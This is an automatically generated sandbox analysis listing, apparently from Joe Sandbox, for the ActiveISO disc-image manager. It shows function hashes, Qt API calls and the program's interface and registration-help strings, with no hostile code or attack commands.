                                                                                                                  • Instruction ID: cf45350f1985ff3fcc068c42bdd09e14d62bf61411725ca47584d53162a8fd1f
                                                                                                                  • Opcode Fuzzy Hash: 886e95917defd12e2f8630cf60c9efe789635d0e7bdc23b47f5e839f07d5569b
                                                                                                                  • Instruction Fuzzy Hash: E4C10D32E15A4296FB00DF71D8961BC2362FB85F89B895031DA0EF7A64DF38E559C344
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000008.00000002.1341205041.00007FF653711000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF653710000, based on PE: true
                                                                                                                  • Associated: 00000008.00000002.1341125497.00007FF653710000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF653773000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF65378B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341614210.00007FF6537E1000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341632616.00007FF6537E4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341683179.00007FF6537E5000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341720320.00007FF6537E9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_8_2_7ff653710000_ActiveISO.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: String@@$Array$Char@@@$?fromAscii_helper@Data@Typed$?setLabel@@String@@@Text@$?arg@Char@@Latin1$?allocate@AllocationData@@Data@@@@@Flags@Option@U1@_V1@_$?currentIndex@Widget@@
                                                                                                                  • String ID: %1 (%2 bytes)$ISO9660$ISO9660 + Joliet$UDF version: %1$Unknown
                                                                                                                  • API String ID: 3192270439-2475499768
                                                                                                                  • Opcode ID: 75959099cf404961a63a65d1ec1920f0918e4440829fb8b6f89ceb7eeaba529d
                                                                                                                  • Instruction ID: 57c903526cb48d8d30f1a1be1967e3f41b078dfa9697b2300579c227db477c11
                                                                                                                  • Opcode Fuzzy Hash: 75959099cf404961a63a65d1ec1920f0918e4440829fb8b6f89ceb7eeaba529d
                                                                                                                  • Instruction Fuzzy Hash: 6DE15D32E14A429AF710DB60E8966AC3372FB98F49F454135DA0EB7B64DF38D549C384
                                                                                                                  APIs
                                                                                                                  • ?translate@QCoreApplication@@SA?AVQString@@PEBD00H@Z.QT5CORE(?,?,?,?,?,00007FF653731251), ref: 00007FF6537305F5
                                                                                                                  • ?setWindowTitle@QWidget@@QEAAXAEBVQString@@@Z.QT5WIDGETS(?,?,?,?,?,00007FF653731251), ref: 00007FF653730602
                                                                                                                  • ??1QString@@QEAA@XZ.QT5CORE(?,?,?,?,?,00007FF653731251), ref: 00007FF65373060D
                                                                                                                  • ??0QString@@QEAA@XZ.QT5CORE(?,?,?,?,?,00007FF653731251), ref: 00007FF653730617
                                                                                                                  • ?setText@QLabel@@QEAAXAEBVQString@@@Z.QT5WIDGETS(?,?,?,?,?,00007FF653731251), ref: 00007FF653730624
                                                                                                                  • ??1QString@@QEAA@XZ.QT5CORE(?,?,?,?,?,00007FF653731251), ref: 00007FF65373062F
                                                                                                                  • ??0QString@@QEAA@XZ.QT5CORE(?,?,?,?,?,00007FF653731251), ref: 00007FF653730639
                                                                                                                  • ?setText@QLabel@@QEAAXAEBVQString@@@Z.QT5WIDGETS(?,?,?,?,?,00007FF653731251), ref: 00007FF653730647
                                                                                                                  • ??1QString@@QEAA@XZ.QT5CORE(?,?,?,?,?,00007FF653731251), ref: 00007FF653730652
                                                                                                                  • ?translate@QCoreApplication@@SA?AVQString@@PEBD00H@Z.QT5CORE(?,?,?,?,?,00007FF653731251), ref: 00007FF653730675
                                                                                                                  • ?setText@QLabel@@QEAAXAEBVQString@@@Z.QT5WIDGETS(?,?,?,?,?,00007FF653731251), ref: 00007FF653730683
                                                                                                                  • ??1QString@@QEAA@XZ.QT5CORE(?,?,?,?,?,00007FF653731251), ref: 00007FF65373068E
                                                                                                                  • ?translate@QCoreApplication@@SA?AVQString@@PEBD00H@Z.QT5CORE(?,?,?,?,?,00007FF653731251), ref: 00007FF6537306B1
                                                                                                                  • ?setText@QLabel@@QEAAXAEBVQString@@@Z.QT5WIDGETS(?,?,?,?,?,00007FF653731251), ref: 00007FF6537306BF
                                                                                                                  • ??1QString@@QEAA@XZ.QT5CORE(?,?,?,?,?,00007FF653731251), ref: 00007FF6537306CA
                                                                                                                  • ?translate@QCoreApplication@@SA?AVQString@@PEBD00H@Z.QT5CORE(?,?,?,?,?,00007FF653731251), ref: 00007FF6537306ED
                                                                                                                  • ?setText@QLabel@@QEAAXAEBVQString@@@Z.QT5WIDGETS(?,?,?,?,?,00007FF653731251), ref: 00007FF6537306FB
                                                                                                                  • ??1QString@@QEAA@XZ.QT5CORE(?,?,?,?,?,00007FF653731251), ref: 00007FF653730706
                                                                                                                  • ?translate@QCoreApplication@@SA?AVQString@@PEBD00H@Z.QT5CORE(?,?,?,?,?,00007FF653731251), ref: 00007FF653730729
                                                                                                                  • ?setText@QLabel@@QEAAXAEBVQString@@@Z.QT5WIDGETS(?,?,?,?,?,00007FF653731251), ref: 00007FF653730737
                                                                                                                  • ??1QString@@QEAA@XZ.QT5CORE(?,?,?,?,?,00007FF653731251), ref: 00007FF653730742
                                                                                                                  • ?translate@QCoreApplication@@SA?AVQString@@PEBD00H@Z.QT5CORE(?,?,?,?,?,00007FF653731251), ref: 00007FF653730765
                                                                                                                  • ?setText@QLabel@@QEAAXAEBVQString@@@Z.QT5WIDGETS(?,?,?,?,?,00007FF653731251), ref: 00007FF653730773
                                                                                                                  • ??1QString@@QEAA@XZ.QT5CORE(?,?,?,?,?,00007FF653731251), ref: 00007FF65373077E
                                                                                                                  • ?translate@QCoreApplication@@SA?AVQString@@PEBD00H@Z.QT5CORE(?,?,?,?,?,00007FF653731251), ref: 00007FF6537307A1
                                                                                                                  • ?setText@QLabel@@QEAAXAEBVQString@@@Z.QT5WIDGETS(?,?,?,?,?,00007FF653731251), ref: 00007FF6537307AF
                                                                                                                  • ??1QString@@QEAA@XZ.QT5CORE(?,?,?,?,?,00007FF653731251), ref: 00007FF6537307BA
                                                                                                                  • ?translate@QCoreApplication@@SA?AVQString@@PEBD00H@Z.QT5CORE(?,?,?,?,?,00007FF653731251), ref: 00007FF6537307DD
                                                                                                                  • ?setText@QLabel@@QEAAXAEBVQString@@@Z.QT5WIDGETS(?,?,?,?,?,00007FF653731251), ref: 00007FF6537307EB
                                                                                                                  • ??1QString@@QEAA@XZ.QT5CORE(?,?,?,?,?,00007FF653731251), ref: 00007FF6537307F6
                                                                                                                  • ?translate@QCoreApplication@@SA?AVQString@@PEBD00H@Z.QT5CORE(?,?,?,?,?,00007FF653731251), ref: 00007FF653730819
                                                                                                                  • ?setText@QLabel@@QEAAXAEBVQString@@@Z.QT5WIDGETS(?,?,?,?,?,00007FF653731251), ref: 00007FF653730827
                                                                                                                  • ??1QString@@QEAA@XZ.QT5CORE(?,?,?,?,?,00007FF653731251), ref: 00007FF653730832
                                                                                                                  • ?translate@QCoreApplication@@SA?AVQString@@PEBD00H@Z.QT5CORE(?,?,?,?,?,00007FF653731251), ref: 00007FF653730855
                                                                                                                  • ?setText@QLabel@@QEAAXAEBVQString@@@Z.QT5WIDGETS(?,?,?,?,?,00007FF653731251), ref: 00007FF653730863
                                                                                                                  • ??1QString@@QEAA@XZ.QT5CORE(?,?,?,?,?,00007FF653731251), ref: 00007FF65373086E
                                                                                                                  • ?translate@QCoreApplication@@SA?AVQString@@PEBD00H@Z.QT5CORE(?,?,?,?,?,00007FF653731251), ref: 00007FF653730891
                                                                                                                  • ?setText@QAbstractButton@@QEAAXAEBVQString@@@Z.QT5WIDGETS(?,?,?,?,?,00007FF653731251), ref: 00007FF65373089F
                                                                                                                  • ??1QString@@QEAA@XZ.QT5CORE(?,?,?,?,?,00007FF653731251), ref: 00007FF6537308AA
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000008.00000002.1341205041.00007FF653711000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF653710000, based on PE: true
                                                                                                                  • Associated: 00000008.00000002.1341125497.00007FF653710000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF653773000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF65378B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341614210.00007FF6537E1000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341632616.00007FF6537E4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341683179.00007FF6537E5000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341720320.00007FF6537E9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_8_2_7ff653710000_ActiveISO.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: String@@$?setString@@@$Text@$?translate@Application@@CoreLabel@@$AbstractButton@@Title@Widget@@Window
                                                                                                                  • String ID: 0 bytes (0 bytes)$<B>ISO file properties$Close$File System:$Files:$Folders:$ISO 9660$Properties$Size:$iso_infoClass
                                                                                                                  • API String ID: 618049156-3833393911
                                                                                                                  • Opcode ID: 3c2da2bce682892f907c9485a32ed1dd3feb7210e643747d880410d2016d3efa
                                                                                                                  • Instruction ID: bc20ec9c43509c3ad74a62091eda7d93543ad795b4ca514644c534fdce52f2b1
                                                                                                                  • Opcode Fuzzy Hash: 3c2da2bce682892f907c9485a32ed1dd3feb7210e643747d880410d2016d3efa
                                                                                                                  • Instruction Fuzzy Hash: 29816C72E24B4296EB009F74EC550A92322FB89F597480632D52EB3AB4DF3CD519C388
                                                                                                                  APIs
                                                                                                                  • ?translate@QCoreApplication@@SA?AVQString@@PEBD00H@Z.QT5CORE(?,?,?,?,?,00007FF65372BBEF), ref: 00007FF65372874E
                                                                                                                  • ?setWindowTitle@QWidget@@QEAAXAEBVQString@@@Z.QT5WIDGETS(?,?,?,?,?,00007FF65372BBEF), ref: 00007FF65372875B
                                                                                                                  • ??1QString@@QEAA@XZ.QT5CORE(?,?,?,?,?,00007FF65372BBEF), ref: 00007FF653728767
                                                                                                                  • ?translate@QCoreApplication@@SA?AVQString@@PEBD00H@Z.QT5CORE(?,?,?,?,?,00007FF65372BBEF), ref: 00007FF65372878B
                                                                                                                  • ?setText@QAbstractButton@@QEAAXAEBVQString@@@Z.QT5WIDGETS(?,?,?,?,?,00007FF65372BBEF), ref: 00007FF653728799
                                                                                                                  • ??1QString@@QEAA@XZ.QT5CORE(?,?,?,?,?,00007FF65372BBEF), ref: 00007FF6537287A5
                                                                                                                  • ?translate@QCoreApplication@@SA?AVQString@@PEBD00H@Z.QT5CORE(?,?,?,?,?,00007FF65372BBEF), ref: 00007FF6537287C9
                                                                                                                  • ?setText@QAbstractButton@@QEAAXAEBVQString@@@Z.QT5WIDGETS(?,?,?,?,?,00007FF65372BBEF), ref: 00007FF6537287D7
                                                                                                                  • ??1QString@@QEAA@XZ.QT5CORE(?,?,?,?,?,00007FF65372BBEF), ref: 00007FF6537287E3
                                                                                                                  • ?translate@QCoreApplication@@SA?AVQString@@PEBD00H@Z.QT5CORE(?,?,?,?,?,00007FF65372BBEF), ref: 00007FF653728807
                                                                                                                  • ?setText@QAbstractButton@@QEAAXAEBVQString@@@Z.QT5WIDGETS(?,?,?,?,?,00007FF65372BBEF), ref: 00007FF653728815
                                                                                                                  • ??1QString@@QEAA@XZ.QT5CORE(?,?,?,?,?,00007FF65372BBEF), ref: 00007FF653728821
                                                                                                                  • ?translate@QCoreApplication@@SA?AVQString@@PEBD00H@Z.QT5CORE(?,?,?,?,?,00007FF65372BBEF), ref: 00007FF653728845
                                                                                                                  • ?setText@QAbstractButton@@QEAAXAEBVQString@@@Z.QT5WIDGETS(?,?,?,?,?,00007FF65372BBEF), ref: 00007FF653728853
                                                                                                                  • ??1QString@@QEAA@XZ.QT5CORE(?,?,?,?,?,00007FF65372BBEF), ref: 00007FF65372885F
                                                                                                                  • ?translate@QCoreApplication@@SA?AVQString@@PEBD00H@Z.QT5CORE(?,?,?,?,?,00007FF65372BBEF), ref: 00007FF653728883
                                                                                                                  • ?setText@QAbstractButton@@QEAAXAEBVQString@@@Z.QT5WIDGETS(?,?,?,?,?,00007FF65372BBEF), ref: 00007FF653728891
                                                                                                                  • ??1QString@@QEAA@XZ.QT5CORE(?,?,?,?,?,00007FF65372BBEF), ref: 00007FF65372889D
                                                                                                                  • ?translate@QCoreApplication@@SA?AVQString@@PEBD00H@Z.QT5CORE(?,?,?,?,?,00007FF65372BBEF), ref: 00007FF6537288C1
                                                                                                                  • ?indexOf@QTabWidget@@QEBAHPEAVQWidget@@@Z.QT5WIDGETS(?,?,?,?,?,00007FF65372BBEF), ref: 00007FF6537288D2
                                                                                                                  • ?setTabText@QTabWidget@@QEAAXHAEBVQString@@@Z.QT5WIDGETS(?,?,?,?,?,00007FF65372BBEF), ref: 00007FF6537288E1
                                                                                                                  • ??1QString@@QEAA@XZ.QT5CORE(?,?,?,?,?,00007FF65372BBEF), ref: 00007FF6537288ED
                                                                                                                  • ?translate@QCoreApplication@@SA?AVQString@@PEBD00H@Z.QT5CORE(?,?,?,?,?,00007FF65372BBEF), ref: 00007FF653728911
                                                                                                                  • ?setTitle@QMenu@@QEAAXAEBVQString@@@Z.QT5WIDGETS(?,?,?,?,?,00007FF65372BBEF), ref: 00007FF65372891F
                                                                                                                  • ??1QString@@QEAA@XZ.QT5CORE(?,?,?,?,?,00007FF65372BBEF), ref: 00007FF65372892B
                                                                                                                  • ?translate@QCoreApplication@@SA?AVQString@@PEBD00H@Z.QT5CORE(?,?,?,?,?,00007FF65372BBEF), ref: 00007FF65372894F
                                                                                                                  • ?setTitle@QMenu@@QEAAXAEBVQString@@@Z.QT5WIDGETS(?,?,?,?,?,00007FF65372BBEF), ref: 00007FF65372895D
                                                                                                                  • ??1QString@@QEAA@XZ.QT5CORE(?,?,?,?,?,00007FF65372BBEF), ref: 00007FF653728969
                                                                                                                  • ?translate@QCoreApplication@@SA?AVQString@@PEBD00H@Z.QT5CORE(?,?,?,?,?,00007FF65372BBEF), ref: 00007FF65372898D
                                                                                                                  • ?setTitle@QMenu@@QEAAXAEBVQString@@@Z.QT5WIDGETS(?,?,?,?,?,00007FF65372BBEF), ref: 00007FF65372899E
                                                                                                                  • ??1QString@@QEAA@XZ.QT5CORE(?,?,?,?,?,00007FF65372BBEF), ref: 00007FF6537289AA
                                                                                                                  • ?translate@QCoreApplication@@SA?AVQString@@PEBD00H@Z.QT5CORE(?,?,?,?,?,00007FF65372BBEF), ref: 00007FF6537289CE
                                                                                                                  • ?setTitle@QMenu@@QEAAXAEBVQString@@@Z.QT5WIDGETS(?,?,?,?,?,00007FF65372BBEF), ref: 00007FF6537289DF
                                                                                                                  • ??1QString@@QEAA@XZ.QT5CORE(?,?,?,?,?,00007FF65372BBEF), ref: 00007FF6537289EB
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000008.00000002.1341205041.00007FF653711000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF653710000, based on PE: true
                                                                                                                  • Associated: 00000008.00000002.1341125497.00007FF653710000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF653773000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF65378B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341614210.00007FF6537E1000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341632616.00007FF6537E4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341683179.00007FF6537E5000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341720320.00007FF6537E9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_8_2_7ff653710000_ActiveISO.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: String@@$?set?translate@Application@@CoreString@@@$Text@$AbstractButton@@Title@$Menu@@$Widget@@$?indexWidget@@@Window
                                                                                                                  • String ID: Active@ ISO Manager$Add Files to a New ISO$Burn ISO$Create an Empty ISO$Edit$File$Help$Import CD/DVD/Blu-ray Disc$Load ISO$MyIsoFile.iso *$Tools$isoManagerClass
                                                                                                                  • API String ID: 1590779230-2276111130
                                                                                                                  • Opcode ID: 4cfa7d03a95184000a3a0a28f7d29c48e9972f9ae369d9fb8ec2e9c12fe06c9d
                                                                                                                  • Instruction ID: c52bfcc8c5c762e5d34d2b55438822fc3da4c221d866b5779e9fb909519b3a6e
                                                                                                                  • Opcode Fuzzy Hash: 4cfa7d03a95184000a3a0a28f7d29c48e9972f9ae369d9fb8ec2e9c12fe06c9d
                                                                                                                  • Instruction Fuzzy Hash: 6B816472E38A43D6EA009B60F85546A6332FB86F55B441231D65EB3AB4DF3CE90DC748
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000008.00000002.1341205041.00007FF653711000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF653710000, based on PE: true
                                                                                                                  • Associated: 00000008.00000002.1341125497.00007FF653710000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF653773000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF65378B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341614210.00007FF6537E1000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341632616.00007FF6537E4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341683179.00007FF6537E5000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341720320.00007FF6537E9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_8_2_7ff653710000_ActiveISO.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: String@@$?set?translate@Application@@CoreString@@@$Text@$Box@@$ComboItem$Title@$GroupLabel@@$AbstractButton@@Widget@@Window
                                                                                                                  • String ID: Image$Add Boot Image $Add...$Emulation$Floppy 1.2 MB emulation$Floppy 1.44 MB emulation$Floppy 2.88 MB emulation$Hard drive emulation$No emulation$Volume Label $widget_Iso$widget_IsoClass
                                                                                                                  • API String ID: 1664529544-2037536044
                                                                                                                  • Opcode ID: 5259834b1a46806600dc2684582710a18d6ba1b22f76dae5f0687e046f1dbfc1
                                                                                                                  • Instruction ID: e6877144c6258776b7ece6f6b4d315f701ddaad37545253652344591c362e209
                                                                                                                  • Opcode Fuzzy Hash: 5259834b1a46806600dc2684582710a18d6ba1b22f76dae5f0687e046f1dbfc1
                                                                                                                  • Instruction Fuzzy Hash: 02718272D28B8396E6009F60F8454696732FB8AF55B541231D65EF3AB8DF3CD908C748
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  • You've completed the registration successfully. Thank you!<br><br>Once again, you can review the license terms and limitations for usage and re-distribution of %1 and Commercial versions of the software., xrefs: 00007FF653749DAF
                                                                                                                  • If your registration is valid and active, you can deactivate and remove the local license to be able to use it somewhere else.<br><br>Click <b>Deactivate Registration</b> and automatic license de-activation occured over the internet.<br><br>If no internet con, xrefs: 00007FF653749E28
                                                                                                                  • This step provides the option of registering the %1 version. Once %1 version gets registered, this registration dialog won't popup at the next program start.<br><br>You can just close the dialog to postpone the registration and keep evaluating the %1 version.<, xrefs: 00007FF653749F1A
                                                                                                                  • Registration & Licensing Help, xrefs: 00007FF65374A017
                                                                                                                  • This step provides options of evaluating and registering the %3 version, registering the commercial version with a purchased license key, activating and de-activating the registration over the internet or even off-line.<br><br>You can just close the dialog to , xrefs: 00007FF653749F7D
                                                                                                                  • www.lsoft.net/act, xrefs: 00007FF653749E10
                                                                                                                  • This help is likely not to be of any help., xrefs: 00007FF653749D89
                                                                                                                  • Please type in the name and the registration key you've received. If the key is valid, automatic license validation, registration and activation occured over the internet.<br><br>If no internet connection detected, activation request is displayed. Save it to t, xrefs: 00007FF653749EAC
                                                                                                                  • www.lsoft.net/act, xrefs: 00007FF653749E94
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000008.00000002.1341205041.00007FF653711000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF653710000, based on PE: true
                                                                                                                  • Associated: 00000008.00000002.1341125497.00007FF653710000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF653773000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF65378B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341614210.00007FF6537E1000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341632616.00007FF6537E4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341683179.00007FF6537E5000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341720320.00007FF6537E9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_8_2_7ff653710000_ActiveISO.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: String@@$Char@@@$?arg@Array@@ByteChar@@Latin1V0@$$V0@@$?fromArrayAscii_helper@Data@MessageStandardTyped$?current?information@?tr@Box@@Box@@@@Button@Button@1@Flags@MetaObject@@String@@1W421@@Widget@@Wizard@@
                                                                                                                  • String ID: If your registration is valid and active, you can deactivate and remove the local license to be able to use it somewhere else.<br><br>Click <b>Deactivate Registration</b> and automatic license de-activation occured over the internet.<br><br>If no internet con$Please type in the name and the registration key you've received. If the key is valid, automatic license validation, registration and activation occured over the internet.<br><br>If no internet connection detected, activation request is displayed. Save it to t$Registration & Licensing Help$This help is likely not to be of any help.$This step provides options of evaluating and registering the %3 version, registering the commercial version with a purchased license key, activating and de-activating the registration over the internet or even off-line.<br><br>You can just close the dialog to $This step provides the option of registering the %1 version. Once %1 version gets registered, this registration dialog won't popup at the next program start.<br><br>You can just close the dialog to postpone the registration and keep evaluating the %1 version.<$You've completed the registration successfully. Thank you!<br><br>Once again, you can review the license terms and limitations for usage and re-distribution of %1 and Commercial versions of the software.$www.lsoft.net/act$www.lsoft.net/act
                                                                                                                  • API String ID: 3622381987-1008371562
                                                                                                                  • Opcode ID: eed172e268dba457def7fc8d329a04f6d072207d4ad24bb86af60ee92e79d3da
                                                                                                                  • Instruction ID: 6b69393cb1e0c23b50c6e844b1425f71b852bae3a1d5596576a3e18db13eca4c
                                                                                                                  • Opcode Fuzzy Hash: eed172e268dba457def7fc8d329a04f6d072207d4ad24bb86af60ee92e79d3da
                                                                                                                  • Instruction Fuzzy Hash: 42917122E24902A9FB509F70D8925FC2732FB55B58B892131E51FB3EA4EF2CD548C384
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00007FF653769FB8: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,FFFFFFFF,00007FF65371257E), ref: 00007FF653769FD2
                                                                                                                  • ??0QStandardItemModel@@QEAA@HHPEAVQObject@@@Z.QT5GUI ref: 00007FF65374E897
                                                                                                                  • ?tr@QObject@@SA?AVQString@@PEBD0H@Z.QT5CORE ref: 00007FF65374E8BE
                                                                                                                  • ??0QVariant@@QEAA@AEBVQString@@@Z.QT5CORE ref: 00007FF65374E8CC
                                                                                                                  • ??1QVariant@@QEAA@XZ.QT5CORE ref: 00007FF65374E8F6
                                                                                                                  • ??1QString@@QEAA@XZ.QT5CORE ref: 00007FF65374E901
                                                                                                                  • ?tr@QObject@@SA?AVQString@@PEBD0H@Z.QT5CORE ref: 00007FF65374E919
                                                                                                                  • ??0QVariant@@QEAA@AEBVQString@@@Z.QT5CORE ref: 00007FF65374E927
                                                                                                                  • ??1QVariant@@QEAA@XZ.QT5CORE ref: 00007FF65374E953
                                                                                                                  • ??1QString@@QEAA@XZ.QT5CORE ref: 00007FF65374E95E
                                                                                                                  • ?tr@QObject@@SA?AVQString@@PEBD0H@Z.QT5CORE ref: 00007FF65374E976
                                                                                                                  • ??0QVariant@@QEAA@AEBVQString@@@Z.QT5CORE ref: 00007FF65374E984
                                                                                                                  • ??1QVariant@@QEAA@XZ.QT5CORE ref: 00007FF65374E9B1
                                                                                                                  • ??1QString@@QEAA@XZ.QT5CORE ref: 00007FF65374E9BC
                                                                                                                  • ??0QModelIndex@@QEAA@XZ.QT5CORE ref: 00007FF65374E9E4
                                                                                                                  • ?insertRow@QStandardItemModel@@QEAA_NHAEBVQModelIndex@@@Z.QT5GUI ref: 00007FF65374E9F2
                                                                                                                  • ??0QVariant@@QEAA@AEBVQString@@@Z.QT5CORE ref: 00007FF65374EA00
                                                                                                                  • ??0QModelIndex@@QEAA@XZ.QT5CORE ref: 00007FF65374EA0E
                                                                                                                  • ??1QVariant@@QEAA@XZ.QT5CORE ref: 00007FF65374EA44
                                                                                                                    • Part of subcall function 00007FF6537460F0: ??0QString@@QEAA@XZ.QT5CORE ref: 00007FF65374611E
                                                                                                                    • Part of subcall function 00007FF6537460F0: ??0QString@@QEAA@$$QEAV0@@Z.QT5CORE ref: 00007FF653746150
                                                                                                                    • Part of subcall function 00007FF6537460F0: ??1QString@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,?,?,00000000,00000000,?,00007FF65374E9D0), ref: 00007FF653746390
                                                                                                                  • ??0QVariant@@QEAA@AEBVQString@@@Z.QT5CORE ref: 00007FF65374EA63
                                                                                                                  • ??0QModelIndex@@QEAA@XZ.QT5CORE ref: 00007FF65374EA71
                                                                                                                  • ??1QVariant@@QEAA@XZ.QT5CORE ref: 00007FF65374EAAA
                                                                                                                  • ??1QString@@QEAA@XZ.QT5CORE ref: 00007FF65374EAB5
                                                                                                                    • Part of subcall function 00007FF6537460F0: ?fromAscii_helper@QString@@CAPEAU?$QTypedArrayData@G@@PEBDH@Z.QT5CORE ref: 00007FF653746167
                                                                                                                    • Part of subcall function 00007FF6537460F0: ??0QChar@@QEAA@UQLatin1Char@@@Z.QT5CORE ref: 00007FF653746177
                                                                                                                    • Part of subcall function 00007FF6537460F0: ?arg@QString@@QEBA?AV1@HHHVQChar@@@Z.QT5CORE(?,?,?,?,?,?,?,?,00000000,00000000,?,00007FF65374E9D0), ref: 00007FF65374619B
                                                                                                                    • Part of subcall function 00007FF6537460F0: ??4QByteArray@@QEAAAEAV0@$$QEAV0@@Z.QT5CORE(?,?,?,?,?,?,?,?,00000000,00000000,?,00007FF65374E9D0), ref: 00007FF6537461A8
                                                                                                                    • Part of subcall function 00007FF6537460F0: ??1QString@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,?,?,00000000,00000000,?,00007FF65374E9D0), ref: 00007FF6537461B2
                                                                                                                    • Part of subcall function 00007FF6537460F0: ??1QString@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,?,?,00000000,00000000,?,00007FF65374E9D0), ref: 00007FF653746346
                                                                                                                    • Part of subcall function 00007FF6537460F0: ?fromAscii_helper@QString@@CAPEAU?$QTypedArrayData@G@@PEBDH@Z.QT5CORE(?,?,?,?,?,?,?,?,00000000,00000000,?,00007FF65374E9D0), ref: 00007FF653746358
                                                                                                                    • Part of subcall function 00007FF6537460F0: ??1QSettings@@UEAA@XZ.QT5CORE(?,?,?,?,?,?,?,?,00000000,00000000,?,00007FF65374E9D0), ref: 00007FF653746385
                                                                                                                  • ??0QVariant@@QEAA@AEBVQString@@@Z.QT5CORE ref: 00007FF65374EAD4
                                                                                                                  • ??0QModelIndex@@QEAA@XZ.QT5CORE ref: 00007FF65374EAE2
                                                                                                                  • ??1QVariant@@QEAA@XZ.QT5CORE ref: 00007FF65374EB1B
                                                                                                                  • ??1QString@@QEAA@XZ.QT5CORE ref: 00007FF65374EB26
                                                                                                                    • Part of subcall function 00007FF6537460F0: ?fromAscii_helper@QString@@CAPEAU?$QTypedArrayData@G@@PEBDH@Z.QT5CORE ref: 00007FF6537461CA
                                                                                                                    • Part of subcall function 00007FF6537460F0: ??0QChar@@QEAA@UQLatin1Char@@@Z.QT5CORE ref: 00007FF6537461DA
                                                                                                                    • Part of subcall function 00007FF6537460F0: ?arg@QString@@QEBA?AV1@HHHVQChar@@@Z.QT5CORE(?,?,?,?,?,?,?,?,00000000,00000000,?,00007FF65374E9D0), ref: 00007FF6537461FE
                                                                                                                    • Part of subcall function 00007FF6537460F0: ??4QByteArray@@QEAAAEAV0@$$QEAV0@@Z.QT5CORE(?,?,?,?,?,?,?,?,00000000,00000000,?,00007FF65374E9D0), ref: 00007FF65374620B
